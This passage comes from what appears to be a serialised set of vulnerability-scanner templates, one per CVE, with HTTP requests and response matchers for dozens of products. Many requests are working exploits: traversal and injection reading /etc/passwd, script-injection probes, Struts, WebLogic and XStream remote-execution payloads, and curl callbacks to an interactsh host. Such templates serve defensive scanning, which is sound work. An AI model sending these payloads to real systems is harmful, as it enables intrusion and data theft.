/>","qdPM"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12478","info":{"name":"TeamPass 2.1.27.36 - Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files/ldap.debug.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Get all LDAP params"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3580","info":{"name":"Cisco ASA/FTD Software - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/{{randstr}}/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7209","info":{"name":"LinuxKI Toolset <= 6.01 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-7107","info":{"name":"WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'</script><svg/onload=alert(document.cookie)>","var Display_FAQ_ID ="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29453","info":{"name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8194","info":{"name":"Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection","severity":"medium"},"requests":[{"raw":["GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\nHost: {{Hostname}}\nCookie: startupapp=st\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jnlp codebase=\"nonexistent.1337\">"]},{"type":"word","part":"header","words":["application/x-java-jnlp-file"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35847","info":{"name":"Agentejo Cockpit <0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"nonexistent_function\"\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_1","regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_1","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_2","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]}]}]},{"id":"CVE-2020-7796","info":{"name":"Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-27191","info":{"name":"LionWiki <3.2.12 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9496","info":{"name":"Apache OFBiz 17.12.03 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["faultString","No such service [ProjectDiscovery]","methodResponse"],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8163","info":{"name":"Ruby on Rails <5.0.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24186","info":{"name":"WordPress wpDiscuz <=7.0.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"action\"\n\nwmuUploadFiles\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_nonce\"\n\n{{wmuSecurity}}\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\n\nundefined\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\nContent-Type: image/png\n\n{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n<?php phpinfo();?>\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"postId\"\n\n1\n------WebKitFormBoundary88AhjLimsDMHU1Ak--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["success\":true","fullname","shortname","url"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"wmuSecurity","group":1,"regex":["wmuSecurity\":\"([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"url\":\"([a-z:\\\\/0-9-.]+)\""],"part":"body"}]}]},{"id":"CVE-2020-12054","info":{"name":"WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(123);>","catch-breadcrumb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8497","info":{"name":"Artica Pandora FMS <=7.42 - Arbitrary File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"type\"","\"id_user\"","\"user_name\"","\"text\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19625","info":{"name":"Gridx 1.3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6ca86c2c17047c14437f55c42c801c10"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5284","info":{"name":"Next.js <9.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/static/../server/pages-manifest.json"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\\{\"/_app\":\".*?_app\\.js\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35489","info":{"name":"WordPress Contact Form 7 - Unrestricted File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.3.2')"]},{"type":"word","part":"body","words":["Contact Form 7","== Changelog =="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2020-35987","info":{"name":"Rukovoditel <= 2.7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-11798","info":{"name":"Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/x-download","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24391","info":{"name":"Mongo-Express - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n","GET /public/css/{{randstr}}.css HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-9054","info":{"name":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25506","info":{"name":"D-Link DNS-320 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/system_mgr.cgi? HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nC1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n","POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-10973","info":{"name":"WAVLINK - Access Control","severity":"high"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14750","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\ncmd: curl {{interactsh-url}}\nContent-Type: application/x-www-form-urlencoded\n\n_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\nfield.setAccessible(true);\nObject obj = field.get(adapter);\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\nString cmd = req.getHeader(\"cmd\");\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\nif (cmd != null) {\n    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n    res.getServletOutputStream().flush();\n    res.getWriter().write(\"\");\n}executeThread.interrupt();\n\");\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["ADMINCONSOLESESSION="]},{"type":"regex","part":"body","regex":["<html><head></head><body>(.*)</body></html>"]}]}]},{"id":"CVE-2020-28208","info":{"name":"Rocket.Chat <3.9.1 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\\\":false","\"success\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26217","info":{"name":"XStream <1.4.14 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n            <contentType>text/plain</contentType>\n            <is class='java.io.SequenceInputStream'>\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n                <iterator class='javax.imageio.spi.FilterIterator'>\n                  <iter class='java.util.ArrayList$Itr'>\n                    <cursor>0</cursor>\n                    <lastRet>-1</lastRet>\n                    <expectedModCount>1</expectedModCount>\n                    <outer-class>\n                      <java.lang.ProcessBuilder>\n                        <command>\n                          <string>curl</string>\n                          <string>http://{{interactsh-url}}</string>\n                        </command>\n                      </java.lang.ProcessBuilder>\n                    </outer-class>\n                  </iter>\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>start</name>\n                  </filter>\n                  <next/>\n                </iterator>\n                <type>KEYS</type>\n              </e>\n              <in class='java.io.ByteArrayInputStream'>\n                <buf></buf>\n                <pos>0</pos>\n                <mark>0</mark>\n                <count>0</count>\n              </in>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-35984","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-7943","info":{"name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/metrics/v1/mbeans"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["trapperkeeper"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: {{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?php echo md5('CVE-2012-1823'); ?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3d638155445bffb044eec401381ad784"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-0392","info":{"name":"Apache Struts2 S2-008 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0896","info":{"name":"Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \"<html\")","!contains(body_2, \"<HTML\")"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"windows_working_path","regex":[".?.?\\\\.*\\\\showenv"]},{"type":"regex","name":"linux_working_path","regex":["/.*/showenv"]}]}]},{"id":"CVE-2012-4768","info":{"name":"WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site 